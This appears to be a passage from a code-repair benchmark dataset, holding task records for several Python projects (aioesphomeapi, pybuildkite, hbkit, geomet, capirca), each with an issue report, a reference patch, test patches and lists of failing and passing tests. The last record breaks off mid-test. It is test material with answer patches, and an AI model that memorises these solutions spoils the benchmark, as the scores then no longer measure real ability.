+
+ with pytest.raises(APIConnectionError):
+ await client.text_command(1, "1")
|
thousands of error entries in homeassistant
Not sure what other details you need. Please ask and I will provide.
Noticed MANY of these entries.
Using lates ESPHome and HA versions.
```
File "/usr/src/homeassistant/homeassistant/components/esphome/manager.py", line 695, in execute_service
entry_data.client.execute_service(service, call.data)
File "/usr/local/lib/python3.12/site-packages/aioesphomeapi/client.py", line 1183, in execute_service
int_type = "int_" if apiv >= APIVersion(1, 3) else "legacy_int"
^^^^^^^^^^^^^^^^^^^^^^^^
TypeError: '>=' not supported between instances of 'NoneType' and 'APIVersion'
```
|
0.0
|
a3009097a8cec6132f70c9790a38b19b16348c05
|
[
"tests/test_client.py::test_calls_after_connection_closed"
] |
[
"tests/test_client.py::test_expected_name",
"tests/test_client.py::test_connect_backwards_compat",
"tests/test_client.py::test_finish_connection_wraps_exceptions_as_unhandled_api_error",
"tests/test_client.py::test_connection_released_if_connecting_is_cancelled",
"tests/test_client.py::test_request_while_handshaking",
"tests/test_client.py::test_connect_while_already_connected",
"tests/test_client.py::test_list_entities[input0-output0]",
"tests/test_client.py::test_list_entities[input1-output1]",
"tests/test_client.py::test_subscribe_states",
"tests/test_client.py::test_subscribe_states_camera",
"tests/test_client.py::test_cover_command_legacy[cmd0-req0]",
"tests/test_client.py::test_cover_command_legacy[cmd1-req1]",
"tests/test_client.py::test_cover_command_legacy[cmd2-req2]",
"tests/test_client.py::test_cover_command_legacy[cmd3-req3]",
"tests/test_client.py::test_cover_command[cmd0-req0]",
"tests/test_client.py::test_cover_command[cmd1-req1]",
"tests/test_client.py::test_cover_command[cmd2-req2]",
"tests/test_client.py::test_cover_command[cmd3-req3]",
"tests/test_client.py::test_cover_command[cmd4-req4]",
"tests/test_client.py::test_fan_command[cmd0-req0]",
"tests/test_client.py::test_fan_command[cmd1-req1]",
"tests/test_client.py::test_fan_command[cmd2-req2]",
"tests/test_client.py::test_fan_command[cmd3-req3]",
"tests/test_client.py::test_fan_command[cmd4-req4]",
"tests/test_client.py::test_fan_command[cmd5-req5]",
"tests/test_client.py::test_fan_command[cmd6-req6]",
"tests/test_client.py::test_light_command[cmd0-req0]",
"tests/test_client.py::test_light_command[cmd1-req1]",
"tests/test_client.py::test_light_command[cmd2-req2]",
"tests/test_client.py::test_light_command[cmd3-req3]",
"tests/test_client.py::test_light_command[cmd4-req4]",
"tests/test_client.py::test_light_command[cmd5-req5]",
"tests/test_client.py::test_light_command[cmd6-req6]",
"tests/test_client.py::test_light_command[cmd7-req7]",
"tests/test_client.py::test_light_command[cmd8-req8]",
"tests/test_client.py::test_light_command[cmd9-req9]",
"tests/test_client.py::test_light_command[cmd10-req10]",
"tests/test_client.py::test_light_command[cmd11-req11]",
"tests/test_client.py::test_switch_command[cmd0-req0]",
"tests/test_client.py::test_switch_command[cmd1-req1]",
"tests/test_client.py::test_climate_command_legacy[cmd0-req0]",
"tests/test_client.py::test_climate_command_legacy[cmd1-req1]",
"tests/test_client.py::test_climate_command[cmd0-req0]",
"tests/test_client.py::test_climate_command[cmd1-req1]",
"tests/test_client.py::test_climate_command[cmd2-req2]",
"tests/test_client.py::test_climate_command[cmd3-req3]",
"tests/test_client.py::test_climate_command[cmd4-req4]",
"tests/test_client.py::test_climate_command[cmd5-req5]",
"tests/test_client.py::test_climate_command[cmd6-req6]",
"tests/test_client.py::test_climate_command[cmd7-req7]",
"tests/test_client.py::test_climate_command[cmd8-req8]",
"tests/test_client.py::test_climate_command[cmd9-req9]",
"tests/test_client.py::test_number_command[cmd0-req0]",
"tests/test_client.py::test_number_command[cmd1-req1]",
"tests/test_client.py::test_date_command[cmd0-req0]",
"tests/test_client.py::test_date_command[cmd1-req1]",
"tests/test_client.py::test_lock_command[cmd0-req0]",
"tests/test_client.py::test_lock_command[cmd1-req1]",
"tests/test_client.py::test_lock_command[cmd2-req2]",
"tests/test_client.py::test_lock_command[cmd3-req3]",
"tests/test_client.py::test_select_command[cmd0-req0]",
"tests/test_client.py::test_select_command[cmd1-req1]",
"tests/test_client.py::test_media_player_command[cmd0-req0]",
"tests/test_client.py::test_media_player_command[cmd1-req1]",
"tests/test_client.py::test_media_player_command[cmd2-req2]",
"tests/test_client.py::test_button_command[cmd0-req0]",
"tests/test_client.py::test_siren_command[cmd0-req0]",
"tests/test_client.py::test_siren_command[cmd1-req1]",
"tests/test_client.py::test_siren_command[cmd2-req2]",
"tests/test_client.py::test_siren_command[cmd3-req3]",
"tests/test_client.py::test_siren_command[cmd4-req4]",
"tests/test_client.py::test_siren_command[cmd5-req5]",
"tests/test_client.py::test_siren_command[cmd6-req6]",
"tests/test_client.py::test_execute_service",
"tests/test_client.py::test_request_single_image",
"tests/test_client.py::test_request_image_stream",
"tests/test_client.py::test_alarm_panel_command[cmd0-req0]",
"tests/test_client.py::test_alarm_panel_command[cmd1-req1]",
"tests/test_client.py::test_alarm_panel_command[cmd2-req2]",
"tests/test_client.py::test_text_command[cmd0-req0]",
"tests/test_client.py::test_text_command[cmd1-req1]",
"tests/test_client.py::test_noise_psk_handles_subclassed_string",
"tests/test_client.py::test_no_noise_psk",
"tests/test_client.py::test_empty_noise_psk_or_expected_name",
"tests/test_client.py::test_bluetooth_disconnect",
"tests/test_client.py::test_bluetooth_pair",
"tests/test_client.py::test_bluetooth_pair_connection_drops",
"tests/test_client.py::test_bluetooth_unpair_connection_drops",
"tests/test_client.py::test_bluetooth_clear_cache_connection_drops",
"tests/test_client.py::test_bluetooth_unpair",
"tests/test_client.py::test_bluetooth_clear_cache",
"tests/test_client.py::test_device_info",
"tests/test_client.py::test_bluetooth_gatt_read",
"tests/test_client.py::test_bluetooth_gatt_read_connection_drops",
"tests/test_client.py::test_bluetooth_gatt_read_error",
"tests/test_client.py::test_bluetooth_gatt_read_descriptor",
"tests/test_client.py::test_bluetooth_gatt_write",
"tests/test_client.py::test_bluetooth_gatt_write_connection_drops",
"tests/test_client.py::test_bluetooth_gatt_write_without_response",
"tests/test_client.py::test_bluetooth_gatt_write_descriptor",
"tests/test_client.py::test_bluetooth_gatt_write_descriptor_without_response",
"tests/test_client.py::test_bluetooth_gatt_get_services_connection_drops",
"tests/test_client.py::test_bluetooth_gatt_get_services",
"tests/test_client.py::test_bluetooth_gatt_get_services_errors",
"tests/test_client.py::test_bluetooth_gatt_start_notify_connection_drops",
"tests/test_client.py::test_bluetooth_gatt_start_notify",
"tests/test_client.py::test_bluetooth_gatt_start_notify_fails",
"tests/test_client.py::test_subscribe_bluetooth_le_advertisements",
"tests/test_client.py::test_subscribe_bluetooth_le_raw_advertisements",
"tests/test_client.py::test_subscribe_bluetooth_connections_free",
"tests/test_client.py::test_subscribe_home_assistant_states",
"tests/test_client.py::test_subscribe_logs",
"tests/test_client.py::test_send_home_assistant_state",
"tests/test_client.py::test_subscribe_service_calls",
"tests/test_client.py::test_set_debug",
"tests/test_client.py::test_force_disconnect",
"tests/test_client.py::test_bluetooth_device_connect[False-BluetoothProxyFeature.0-BluetoothDeviceRequestType.CONNECT]",
"tests/test_client.py::test_bluetooth_device_connect[False-BluetoothProxyFeature.REMOTE_CACHING-BluetoothDeviceRequestType.CONNECT_V3_WITHOUT_CACHE]",
"tests/test_client.py::test_bluetooth_device_connect[True-BluetoothProxyFeature.REMOTE_CACHING-BluetoothDeviceRequestType.CONNECT_V3_WITH_CACHE]",
"tests/test_client.py::test_bluetooth_device_connect_and_disconnect_times_out",
"tests/test_client.py::test_bluetooth_device_connect_times_out_disconnect_ok",
"tests/test_client.py::test_bluetooth_device_connect_cancelled",
"tests/test_client.py::test_send_voice_assistant_event",
"tests/test_client.py::test_subscribe_voice_assistant",
"tests/test_client.py::test_subscribe_voice_assistant_failure",
"tests/test_client.py::test_subscribe_voice_assistant_cancels_long_running_handle_start",
"tests/test_client.py::test_api_version_after_connection_closed"
] |
{
"failed_lite_validators": [
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2024-03-10 19:21:14+00:00
|
mit
| 2,194
|
|
pyasi__pybuildkite-70
|
diff --git a/pybuildkite/buildkite.py b/pybuildkite/buildkite.py
index c89d8bd..1fd44b1 100644
--- a/pybuildkite/buildkite.py
+++ b/pybuildkite/buildkite.py
@@ -9,6 +9,7 @@ from pybuildkite.annotations import Annotations
from pybuildkite.artifacts import Artifacts
from pybuildkite.teams import Teams
from pybuildkite.users import Users
+from pybuildkite.meta import Meta
from pybuildkite.decorators import requires_token
@@ -110,3 +111,11 @@ class Buildkite(object):
Get User operations for the Buildkite API
"""
return Users(self.client, self.base_url)
+
+ def meta(self):
+ """
+ Get Meta operations for the Buildkite API
+
+ :return: Client
+ """
+ return Meta(self.client, self.base_url)
diff --git a/pybuildkite/meta.py b/pybuildkite/meta.py
new file mode 100644
index 0000000..10f7333
--- /dev/null
+++ b/pybuildkite/meta.py
@@ -0,0 +1,27 @@
+from posixpath import join as urljoin
+
+from pybuildkite.client import Client
+
+
+class Meta(Client):
+ """
+ Meta operations for the Buildkite API
+ """
+
+ def __init__(self, client, base_url):
+ """
+ Construct the class
+
+ :param client: API Client
+ :param base_url: Base Url
+ """
+ self.client = client
+ self.path = urljoin(base_url, "meta")
+
+ def get_meta_information(self):
+ """
+ Returns meta information
+
+ :return: Returns meta information
+ """
+ return self.client.get(self.path)
diff --git a/requirements.txt b/requirements.txt
index 0fda20c..b64cfd9 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -2,7 +2,7 @@ mock==3.0.5
coveralls==2.0.0
pytest==5.2.1
pytest-cov==2.8.1
-requests==2.22.0
+requests==2.26.0
urllib3==1.26.5
black==19.3b0
typing-extensions==3.7.4.2
|
pyasi/pybuildkite
|
fa356015ec0780a4fbd4cfa7f9c63f01590301b8
|
diff --git a/tests/test_buildkite.py b/tests/test_buildkite.py
index 5bb9d1a..6f5e1db 100644
--- a/tests/test_buildkite.py
+++ b/tests/test_buildkite.py
@@ -11,6 +11,7 @@ from pybuildkite.buildkite import (
Teams,
Users,
Organizations,
+ Meta,
)
from pybuildkite.exceptions import NoAcccessTokenException
@@ -46,6 +47,7 @@ def test_access_token_set():
(Buildkite().users, Users),
(Buildkite().annotations, Annotations),
(Buildkite().organizations, Organizations),
+ (Buildkite().meta, Meta),
],
)
def test_eval(function, expected_type):
diff --git a/tests/test_meta.py b/tests/test_meta.py
new file mode 100644
index 0000000..fff0d8c
--- /dev/null
+++ b/tests/test_meta.py
@@ -0,0 +1,10 @@
+from pybuildkite.meta import Meta
+
+
+def test_get_meta_information(fake_client):
+ """
+ Test get user
+ """
+ meta = Meta(fake_client, "https://api.buildkite.com/v2/")
+ meta.get_meta_information()
+ fake_client.get.assert_called_with(meta.path)
diff --git a/tests/test_pipelines.py b/tests/test_pipelines.py
index 4e55fab..c4126de 100644
--- a/tests/test_pipelines.py
+++ b/tests/test_pipelines.py
@@ -51,6 +51,7 @@ def test_create_pipeline(fake_client):
"command": "buildkite-agent pipeline upload",
}
],
+ "team_uuids": None,
}
)
@@ -86,6 +87,7 @@ def test_create_yaml_pipeline(fake_client):
"name": "test_pipeline",
"repository": "my_repo",
"configuration": "steps:\n - command: ls",
+ "team_uuids": None,
},
)
|
Create functionality for the 'meta' endpoint
Create a new file and class to incorporate the [meta API](https://buildkite.com/docs/apis/rest-api/meta).
- Create a new file called `meta.py`
- Create a class called Meta
- Return the Meta class from a method in [buildkite.py](https://github.com/pyasi/pybuildkite/blob/master/pybuildkite/buildkite.py)
- Write unit tests for the new code
|
0.0
|
fa356015ec0780a4fbd4cfa7f9c63f01590301b8
|
[
"tests/test_buildkite.py::test_access_token_not_set_raises_exception",
"tests/test_buildkite.py::test_access_token_set",
"tests/test_buildkite.py::test_eval[wrapper-Pipelines]",
"tests/test_buildkite.py::test_eval[wrapper-Builds]",
"tests/test_buildkite.py::test_eval[wrapper-Jobs]",
"tests/test_buildkite.py::test_eval[wrapper-Agents]",
"tests/test_buildkite.py::test_eval[wrapper-Emojis]",
"tests/test_buildkite.py::test_eval[wrapper-Artifacts]",
"tests/test_buildkite.py::test_eval[wrapper-Teams]",
"tests/test_buildkite.py::test_eval[wrapper-Users]",
"tests/test_buildkite.py::test_eval[wrapper-Annotations]",
"tests/test_buildkite.py::test_eval[wrapper-Organizations]",
"tests/test_buildkite.py::test_eval[meta-Meta]",
"tests/test_meta.py::test_get_meta_information",
"tests/test_pipelines.py::test_Pipelines",
"tests/test_pipelines.py::test_list_pipelines",
"tests/test_pipelines.py::test_get_pipeline",
"tests/test_pipelines.py::test_create_pipeline",
"tests/test_pipelines.py::test_create_pipeline_with_teams",
"tests/test_pipelines.py::test_create_yaml_pipeline",
"tests/test_pipelines.py::test_create_yaml_pipeline_with_teams",
"tests/test_pipelines.py::test_delete_pipeline",
"tests/test_pipelines.py::test_update_pipeline",
"tests/test_pipelines.py::test_update_pipeline_configuration_and_steps"
] |
[] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_added_files",
"has_many_modified_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-10-02 00:50:01+00:00
|
bsd-2-clause
| 4,705
|
|
graycarl__hbkit-22
|
diff --git a/hbkit/__init__.py b/hbkit/__init__.py
index 78596de..4d9613b 100644
--- a/hbkit/__init__.py
+++ b/hbkit/__init__.py
@@ -1,7 +1,7 @@
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import click
-from . import core, random, short, watch, git, backup, pi, time, config
+from . import core, random, short, watch, git, backup, pi, time, config, ip
__version__ = '0.6.0'
@@ -33,3 +33,4 @@ cli.add_command(backup.cli, 'backup')
cli.add_command(pi.cli, 'pi')
cli.add_command(time.cli, 'time')
cli.add_command(config.cli, 'config')
+cli.add_command(ip.cli, 'ip')
diff --git a/hbkit/ip.py b/hbkit/ip.py
new file mode 100644
index 0000000..e3b846a
--- /dev/null
+++ b/hbkit/ip.py
@@ -0,0 +1,45 @@
+# -*- coding: utf-8 -*-
+from __future__ import absolute_import
+from builtins import * # noqa
+import click
+import requests
+
+
+SERVICES = {
+ 'httpbin': {
+ 'url': 'https://httpbin.org/ip',
+ 'response': lambda data: data['origin']
+ },
+ 'ipify': {
+ 'url': 'https://api.ipify.org',
+ 'params': {
+ 'format': 'json'
+ },
+ 'response': lambda data: data['ip']
+ }
+}
+
+
+@click.group('ip')
+def cli():
+ """Tools about ip address."""
+
+
+@cli.command('get-public')
+@click.option('--timeout', default=5.0, help='Timeout for network requests.')
+def cli_get_public(timeout):
+ """Get current public IP."""
+ for name in ('ipify', 'httpbin'):
+ service = SERVICES[name]
+ try:
+ response = requests.get(service['url'],
+ params=service.get('params'),
+ timeout=timeout)
+ response.raise_for_status()
+ ip = service['response'](response.json())
+ break
+ except requests.exceptions.RequestException:
+ continue
+ else:
+ raise click.ClickException('Can not get public IP')
+ click.echo(ip)
diff --git a/hbkit/lib.py b/hbkit/lib.py
index bee5361..3327846 100644
--- a/hbkit/lib.py
+++ b/hbkit/lib.py
@@ -101,7 +101,9 @@ class ConfigManager(object):
def save_to_file(self):
try:
configfile = open(self.path, 'w')
- except FileNotFoundError:
+ # 暂时没法使用 Python3 的 FileNotFoundError,因为 Python2 没有这个定义
+ # 且 Python-Future 暂时没有对它进行兼容。
+ except IOError:
os.makedirs(os.path.dirname(self.path))
configfile = open(self.path, 'w')
with configfile:
|
graycarl/hbkit
|
52e10591b3db82364ded1bfe3829b4293beedf60
|
diff --git a/tests/test_ip.py b/tests/test_ip.py
new file mode 100644
index 0000000..8040ee2
--- /dev/null
+++ b/tests/test_ip.py
@@ -0,0 +1,52 @@
+# -*- coding: utf-8 -*-
+from __future__ import absolute_import
+from builtins import * # noqa
+import requests
+from hbkit import ip
+
+
+class MockGet(object):
+
+ class FakeResponse(object):
+ def __init__(self, json):
+ self._json = json
+
+ def raise_for_status(self):
+ pass
+
+ def json(self):
+ return self._json
+
+ def __init__(self, responses):
+ self.responses = responses
+
+ def __call__(self, url, params, **kwargs):
+ resp = self.responses[url]
+ if isinstance(resp, Exception):
+ raise resp
+ return self.FakeResponse(resp)
+
+
+def test_get_public(runner, monkeypatch):
+ mock_get = MockGet({
+ 'https://httpbin.org/ip': {
+ 'origin': 'ip from httpbin',
+ },
+ 'https://api.ipify.org': {
+ 'ip': 'ip from ipify',
+ }
+ })
+ monkeypatch.setattr(requests, 'get', mock_get)
+ # normal case
+ result = runner.invoke(ip.cli_get_public).output.strip()
+ assert result == 'ip from ipify'
+
+ # ipify failed case
+ mock_get.responses['https://api.ipify.org'] = requests.Timeout()
+ result = runner.invoke(ip.cli_get_public).output.strip()
+ assert result == 'ip from httpbin'
+
+ # both failed case
+ mock_get.responses['https://httpbin.org/ip'] = requests.Timeout()
+ result = runner.invoke(ip.cli_get_public).output.strip()
+ assert 'Can not get public IP' in result
|
Get current public IP
Sample:
```
$ hbkit ip get-public
202.111.111.111
```
|
0.0
|
52e10591b3db82364ded1bfe3829b4293beedf60
|
[
"tests/test_ip.py::test_get_public"
] |
[] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_added_files",
"has_many_modified_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2018-08-06 06:40:06+00:00
|
mit
| 2,676
|
|
geomet__geomet-101
|
diff --git a/geomet/esri.py b/geomet/esri.py
index e68772d..1000243 100644
--- a/geomet/esri.py
+++ b/geomet/esri.py
@@ -111,7 +111,8 @@ def _dump_geojson_point(obj, srid=None):
"""
coordkey = "coordinates"
coords = obj[coordkey]
- srid = _extract_geojson_srid(obj) or srid
+ if srid is None:
+ srid = _extract_geojson_srid(obj)
return {"x": coords[0], "y": coords[1], "spatialReference": {"wkid": srid}}
@@ -121,7 +122,8 @@ def _dump_geojson_multipoint(obj, srid=None):
"""
coordkey = "coordinates"
- srid = _extract_geojson_srid(obj) or srid
+ if srid is None:
+ srid = _extract_geojson_srid(obj)
return {"points": obj[coordkey], "spatialReference": {"wkid": srid}}
@@ -136,7 +138,8 @@ def _dump_geojson_polyline(obj, srid=None):
coordinates = [obj[coordkey]]
else:
coordinates = obj[coordkey]
- srid = _extract_geojson_srid(obj) or srid
+ if srid is None:
+ srid = _extract_geojson_srid(obj)
return {"paths": coordinates, "spatialReference": {"wkid": srid}}
@@ -157,7 +160,8 @@ def _dump_geojson_polygon(data, srid=None):
else:
for seg in part:
part_list.append([list(coord) for coord in seg])
- srid = _extract_geojson_srid(data) or srid
+ if srid is None:
+ srid = _extract_geojson_srid(data)
return {"rings": part_list, "spatialReference": {"wkid": srid}}
|
geomet/geomet
|
f4def96884c3c5f36fc9be98bc5e351e4aa5a3a6
|
diff --git a/geomet/tests/esri_test.py b/geomet/tests/esri_test.py
index 10a7735..612c6e6 100644
--- a/geomet/tests/esri_test.py
+++ b/geomet/tests/esri_test.py
@@ -28,6 +28,13 @@ esri_json_mpt = {
],
"spatialReference": {"wkid": 4326}
}
+esri_json_mpt_srid_26955 = {
+ "points": [
+ [-97.06138, 32.837], [-97.06133, 32.836],
+ [-97.06124, 32.834], [-97.06127, 32.832],
+ ],
+ "spatialReference": {"wkid": 26955}
+}
esri_json_polylines = {
"paths": [
[[-97.06138, 32.837], [-97.06133, 32.836],
@@ -361,5 +368,38 @@ class TestGeoJSONtoEsriJSON(unittest.TestCase):
self.assertEqual(expected, actual)
+class TestGeoJSONtoEsriJSONCustomSRID(unittest.TestCase):
+ """Tests to convert GeoJSON to EsriJSON, with custom SRIDs.
+
+ Proof for https://github.com/geomet/geomet/issues/99.
+ """
+ def test_dumps_to_esrijson_point_custom_srid(self):
+ self.assertEqual(
+ esri.dumps(gj_pt, srid=2062), {
+ 'spatialReference': {
+ 'wkid': 2062}, 'x': 25282, 'y': 43770})
+
+ def test_dumps_to_esrijson_multipoint_custom_srid(self):
+ self.assertEqual(
+ esri.dumps(gj_multi_pt, srid=26955),
+ esri_json_mpt_srid_26955,
+ )
+
+ def test_dumps_to_esrijson_polyline_custom_srid(self):
+ self.assertEqual(
+ esri.dumps(gj_lintstring, srid=3572),
+ {
+ 'paths': [[[100.0, 100.0], [5.0, 5.0]]],
+ 'spatialReference': {'wkid': 3572},
+ }
+ )
+
+ def test_dumps_to_esrijson_polygon_custom_srid(self):
+ vcheck = {'rings': [[[100.0, 0.0], [101.0, 0.0], [101.0, 1.0], [
+ 100.0, 1.0], [100.0, 0.0]]], 'spatialReference': {'wkid': 2263}}
+ self.assertEqual(esri.dumps(gj_polygon, srid=2263),
+ vcheck)
+
+
if __name__ == "__main__":
unittest.main()
|
srid option for geomet.esri.dumps does not do anything
The option for defining output srid for the esrijson geometry is actively ignored
I have installed version 1.0.0
```python
import geomet.esri
from pprint import pprint
input_geojson = {'coordinates': [494252.595744681, 7066045.31914894], 'type': 'Point'}
esri_json = geomet.esri.dumps(input_geojson, srid=32632)
pprint(esri_json)
# Expected output is
# {'spatialReference': {'wkid': 32632},
# 'x': 494252.595744681,
# 'y': 7066045.31914894}
# Actual output is
# {'spatialReference': {'wkid': 4326},
# 'x': 494252.595744681,
# 'y': 7066045.31914894}
```
I did some investigating into the source code and found all the `_dump_* ` functions in the `esri.py` file includes this line:
```python
srid = _extract_geojson_srid(obj) or srid
```
And inside the `_extract_geojson_srid` function:
```python
def _extract_geojson_srid(obj):
...
return srid or 4326
```
Which means it will never return the srid value i explicitly define. Workaround is the add the crs field into the `input_geojson`
```python
input_geojson = {'coordinates': [494252.595744681, 7066045.31914894], 'type': 'Point', 'crs': {'type': 'name', 'properties': {'name': 'EPSG:32632'}}
```
The simple fix is to change all of the `_extract_geojson_srid(obj) or srid` to `srid or _extract_geojson_srid(obj)`
|
0.0
|
f4def96884c3c5f36fc9be98bc5e351e4aa5a3a6
|
[
"geomet/tests/esri_test.py::TestGeoJSONtoEsriJSONCustomSRID::test_dumps_to_esrijson_multipoint_custom_srid",
"geomet/tests/esri_test.py::TestGeoJSONtoEsriJSONCustomSRID::test_dumps_to_esrijson_point_custom_srid",
"geomet/tests/esri_test.py::TestGeoJSONtoEsriJSONCustomSRID::test_dumps_to_esrijson_polygon_custom_srid",
"geomet/tests/esri_test.py::TestGeoJSONtoEsriJSONCustomSRID::test_dumps_to_esrijson_polyline_custom_srid"
] |
[
"geomet/tests/esri_test.py::TestIOReaderWriter::test_io_dump",
"geomet/tests/esri_test.py::TestIOReaderWriter::test_io_load",
"geomet/tests/esri_test.py::TestEsriJSONtoGeoJSON::test_loads_empty_polygon_to_gj",
"geomet/tests/esri_test.py::TestEsriJSONtoGeoJSON::test_loads_empty_polyline_to_gj",
"geomet/tests/esri_test.py::TestEsriJSONtoGeoJSON::test_loads_empty_pt_to_gj",
"geomet/tests/esri_test.py::TestEsriJSONtoGeoJSON::test_loads_to_empty_mpt_to_gj",
"geomet/tests/esri_test.py::TestEsriJSONtoGeoJSON::test_loads_to_geojson_linstring",
"geomet/tests/esri_test.py::TestEsriJSONtoGeoJSON::test_loads_to_geojson_multipoint",
"geomet/tests/esri_test.py::TestEsriJSONtoGeoJSON::test_loads_to_geojson_point",
"geomet/tests/esri_test.py::TestEsriJSONtoGeoJSON::test_loads_to_geojson_polygon",
"geomet/tests/esri_test.py::TestEsriJSONtoGeoJSON::test_loads_unsupported_geom_type",
"geomet/tests/esri_test.py::TestGeoJSONtoEsriJSON::test_dumps_to_esrijson_multipoint",
"geomet/tests/esri_test.py::TestGeoJSONtoEsriJSON::test_dumps_to_esrijson_point",
"geomet/tests/esri_test.py::TestGeoJSONtoEsriJSON::test_dumps_to_esrijson_polygon1",
"geomet/tests/esri_test.py::TestGeoJSONtoEsriJSON::test_dumps_to_esrijson_polygon2",
"geomet/tests/esri_test.py::TestGeoJSONtoEsriJSON::test_dumps_to_esrijson_polyline1",
"geomet/tests/esri_test.py::TestGeoJSONtoEsriJSON::test_dumps_to_esrijson_polyline2",
"geomet/tests/esri_test.py::TestGeoJSONtoEsriJSON::test_multipolygon_nesting",
"geomet/tests/esri_test.py::TestGeoJSONtoEsriJSON::test_srid_checks"
] |
{
"failed_lite_validators": [
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2023-11-09 00:40:40+00:00
|
apache-2.0
| 2,443
|
|
google__capirca-266
|
diff --git a/capirca/lib/juniper.py b/capirca/lib/juniper.py
index c0a36ad..875f782 100644
--- a/capirca/lib/juniper.py
+++ b/capirca/lib/juniper.py
@@ -163,7 +163,8 @@ class Term(aclgenerator.Term):
'daddr': 'ip-destination-address',
'protocol': 'ip-protocol',
'protocol-except': 'ip-protocol-except',
- 'tcp-est': 'tcp-flags "(ack|rst)"'}}
+ 'tcp-est': 'tcp-flags "(ack|rst)"'}
+ }
def __init__(self, term, term_type, enable_dsmo, noverbose):
super().__init__(term)
@@ -857,7 +858,7 @@ class Juniper(aclgenerator.ACLGenerator):
_PLATFORM = 'juniper'
_DEFAULT_PROTOCOL = 'ip'
- _SUPPORTED_AF = set(('inet', 'inet6', 'bridge'))
+ _SUPPORTED_AF = frozenset(('inet', 'inet6', 'bridge', 'mixed'))
_TERM = Term
SUFFIX = '.jcl'
@@ -942,42 +943,57 @@ class Juniper(aclgenerator.ACLGenerator):
if len(filter_options) > 1:
filter_type = filter_options[1]
- term_names = set()
- new_terms = []
- for term in terms:
+ if filter_type == 'mixed':
+ filter_types_to_process = ['inet', 'inet6']
+ else:
+ filter_types_to_process = [filter_type]
- # if inactive is set, deactivate the term and remove the option.
- if 'inactive' in term.option:
- term.inactive = True
- term.option.remove('inactive')
-
- term.name = self.FixTermLength(term.name)
-
- if term.name in term_names:
- raise JuniperDuplicateTermError('You have multiple terms named: %s' %
- term.name)
- term_names.add(term.name)
-
- term = self.FixHighPorts(term, af=filter_type)
- if not term:
- continue
-
- if term.expiration:
- if term.expiration <= exp_info_date:
- logging.info('INFO: Term %s in policy %s expires '
- 'in less than two weeks.', term.name, filter_name)
- if term.expiration <= current_date:
- logging.warning('WARNING: Term %s in policy %s is expired and '
- 'will not be rendered.', term.name, filter_name)
- continue
- if 'is-fragment' in term.option and filter_type == 'inet6':
- raise JuniperFragmentInV6Error('The term %s uses "is-fragment" but '
- 'is a v6 policy.' % term.name)
+ for filter_type in filter_types_to_process:
+
+ filter_name_suffix = ''
+ # If mixed filter_type, will append 4 or 6 to the filter name
+ if len(filter_types_to_process) > 1:
+ if filter_type == 'inet':
+ filter_name_suffix = '4'
+ if filter_type == 'inet6':
+ filter_name_suffix = '6'
+
+ term_names = set()
+ new_terms = []
+ for term in terms:
- new_terms.append(self._TERM(term, filter_type, enable_dsmo, noverbose))
+ # if inactive is set, deactivate the term and remove the option.
+ if 'inactive' in term.option:
+ term.inactive = True
+ term.option.remove('inactive')
+
+ term.name = self.FixTermLength(term.name)
+
+ if term.name in term_names:
+ raise JuniperDuplicateTermError('You have multiple terms named: %s' %
+ term.name)
+ term_names.add(term.name)
+
+ term = self.FixHighPorts(term, af=filter_type)
+ if not term:
+ continue
- self.juniper_policies.append((header, filter_name, filter_type,
- interface_specific, new_terms))
+ if term.expiration:
+ if term.expiration <= exp_info_date:
+ logging.info('INFO: Term %s in policy %s expires '
+ 'in less than two weeks.', term.name, filter_name)
+ if term.expiration <= current_date:
+ logging.warning('WARNING: Term %s in policy %s is expired and '
+ 'will not be rendered.', term.name, filter_name)
+ continue
+ if 'is-fragment' in term.option and filter_type == 'inet6':
+ raise JuniperFragmentInV6Error('The term %s uses "is-fragment" but '
+ 'is a v6 policy.' % term.name)
+
+ new_terms.append(self._TERM(term, filter_type, enable_dsmo, noverbose))
+
+ self.juniper_policies.append((header, filter_name + filter_name_suffix, filter_type,
+ interface_specific, new_terms))
def __str__(self):
config = Config()
|
google/capirca
|
2b1c3519255fa0940a464521197d80187b355570
|
diff --git a/tests/lib/juniper_test.py b/tests/lib/juniper_test.py
index 2846360..95557c3 100644
--- a/tests/lib/juniper_test.py
+++ b/tests/lib/juniper_test.py
@@ -20,6 +20,7 @@ from absl.testing import absltest
from unittest import mock
from absl import logging
+from absl.testing import parameterized
from capirca.lib import aclgenerator
from capirca.lib import juniper
from capirca.lib import nacaddr
@@ -42,6 +43,11 @@ header {
target:: juniper test-filter inet6
}
"""
+GOOD_HEADER_MIXED = """
+header {
+ target:: juniper test-filter mixed
+}
+"""
GOOD_HEADER_BRIDGE = """
header {
target:: juniper test-filter bridge
@@ -533,6 +539,16 @@ term flex-match-term-1 {
}
"""
+MIXED_TESTING_TERM = """
+term good-term {
+ protocol:: tcp
+ source-address:: SOME_HOST
+ destination-port:: SMTP
+ destination-address:: SOME_OTHER_HOST
+ action:: accept
+}
+"""
+
SUPPORTED_TOKENS = frozenset([
'action',
'address',
@@ -645,7 +661,7 @@ SUPPORTED_SUB_TOKENS = {
EXP_INFO = 2
-class JuniperTest(absltest.TestCase):
+class JuniperTest(parameterized.TestCase):
def setUp(self):
super().setUp()
@@ -1533,6 +1549,136 @@ class JuniperTest(absltest.TestCase):
GOOD_HEADER_V6 + BAD_FLEX_MATCH_TERM_4,
self.naming)
+ @parameterized.named_parameters(
+ ('MIXED_TO_V4',
+ [[nacaddr.IPv4('0.0.0.0/1'),
+ nacaddr.IPv6('2001::/33')], [nacaddr.IPv4('192.168.0.0/24')]], [
+ ' term good-term {\n' +
+ ' from {\n' +
+ ' source-address {\n' +
+ ' 0.0.0.0/1;\n' +
+ ' }\n' +
+ ' destination-address {\n' +
+ ' 192.168.0.0/24;\n' +
+ ' }'
+ ], ['2001::/33']),
+ ('V4_TO_MIXED', [
+ [nacaddr.IPv4('192.168.0.0/24')],
+ [nacaddr.IPv4('0.0.0.0/1'),
+ nacaddr.IPv6('2001::/33')],
+ ], [
+ ' term good-term {\n' +
+ ' from {\n' +
+ ' source-address {\n' +
+ ' 192.168.0.0/24;\n' +
+ ' }\n' +
+ ' destination-address {\n' +
+ ' 0.0.0.0/1;\n' +
+ ' }'
+ ], ['2001::/33']),
